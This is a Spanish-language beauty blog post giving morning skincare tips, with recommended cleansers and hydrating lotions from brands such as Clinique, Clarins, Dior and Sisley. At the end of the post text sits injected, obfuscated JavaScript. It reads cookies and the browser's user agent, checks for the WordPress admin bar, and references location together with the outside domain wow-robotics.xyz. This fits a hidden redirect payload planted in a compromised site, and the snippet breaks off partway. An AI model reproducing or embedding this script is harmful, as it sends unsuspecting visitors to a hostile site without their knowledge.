Con el paso del tiempo, los agentes externos como la contaminación e incluso no desmaquillarnos bien son factores para que la piel no se encuentre en su mejor estado, por lo que la limpieza corporal en general y facial en concreto, son fundamentales para brillar.

A pesar de que las limpiezas más profundas se realicen por la noche, no debemos olvidar que por la mañana también debemos protegernos del sol y de otros agentes. De hecho, debemos eliminar el exceso de grasa de la piel que ésta segrega por la noche. En este post vamos a darte unos consejos para la limpieza por fases.

tratamientos_piel_limpia

 

Primeros pasos para nuestra limpieza matinal: limpia y desmaquíllate

Lo primero que deberíamos hacer al levantarnos es limpiar el rostro con un limpiador suave que respete la piel y limpie las impurezas acumuladas durante la noche, que no son pocas. La limpieza facial equilibra los niveles de grasa e hidratación, lo que permite que la salud de nuestra piel mejore notablemente. Una buena opción para ello es el limpiador y desmaquillador miscelar en gel de Clinique, que retira el maquilla ligero del rostro, ojos y labios, además de impurezas, exceso de grasa y restos de contaminación de la piel rápida y delicadamente. Si prefieres un limpiador que no necesita aclarado, opta por Eau de Confort Nettoyante Express de Clarins, ya que elimina con suavidad las impurezas y maquillajes ligeros sin efecto espumoso.

tratamientos_hidratar_piel

 

Hidrata la piel

Siempre es un “must” para todo, pero es cierto que la importancia de hidratar la piel es crucial. Gracias a ello, la piel estará mucho más resistente y flexible, además de que la capacidad de ésta para defenderse de del daño que causan agentes externos como los que hemos mencionado antes, se evitarán lesiones, alergias e irritaciones. Además de por dentro bebiendo agua, debemos cuidarnos por fuera con cremas que se adapten a tu tipo de piel, o incluso mascarillas que hagan buena limpieza facial.

Una loción potente enriquecida con prebiótico que ayuda a hidratar la piel, reequilibrándola y minimizando imperfecciones es Dior Hydra Life, apta para todo tipo de pieles y cómo tónico desmaquillante. Si prefieres una versión que sirve tanto para el día como para la noche, elige Eau Florale de Sisley, que alivia y relaja instantáneamente la epidermis, despertándola con suavidad por la mañana y retirando restos de maquillaje por la noche.

 

hidrata_la_piel

 

Y tú, ¿qué productos utilizas para mantener tu piel limpia? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone